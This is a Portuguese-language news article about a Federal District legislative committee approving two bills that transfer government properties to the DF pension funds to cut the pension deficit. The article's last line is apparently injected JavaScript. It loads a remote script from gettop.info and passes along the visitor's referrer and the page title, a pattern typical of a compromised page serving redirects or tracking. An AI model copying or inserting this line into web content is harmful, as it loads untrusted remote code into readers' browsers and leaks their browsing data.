A Comissão de Assuntos Fundiários (CAF) da Câmara Legislativa aprovou dois projetos do Executivo que tratam da doação e da incorporação de imóveis. O objetivo, segundo o governo do Distrito Federal, é gerar \”receitas próprias e perenes\” no sistema previdenciário, reduzindo o déficit do setor. Com os votos favoráveis dos três deputados presentes, as proposições seguem em tramitação nas comissões antes de serem apreciadas pelo plenário da Casa.
O primeiro projeto aprovado foi o PLC nº 74/2016, que trata da incorporação de imóveis do GDF ao patrimônio do Fundo Previdenciário do DF (DFPrev). Os imóveis estão localizados no SIA, na Asa Sul, em Sobradinho e no Lago Sul. Segundo informou a relatora, deputada Telma Rufino (sem partido), a matéria já foi tema de audiência pública e o projeto não altera a destinação dos imóveis.
Já o PL nº 1.252/2016 autoriza a Terracap a doar imóveis localizados em Santa Maria ao DF, de forma a permitir ao governo transferir os terrenos ao Instituto de Previdência de Servidores do DF (Iprev/DF). Essa medida, de acordo com o GDF, atende a recomendações do Ministério Público de Contas do DF e da Procuradoria-Geral do DF.
Além de Telma Rufino, participaram da reunião da CAF os deputados Lira (PHS) e Professor Reginaldo Veras (PDT).
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;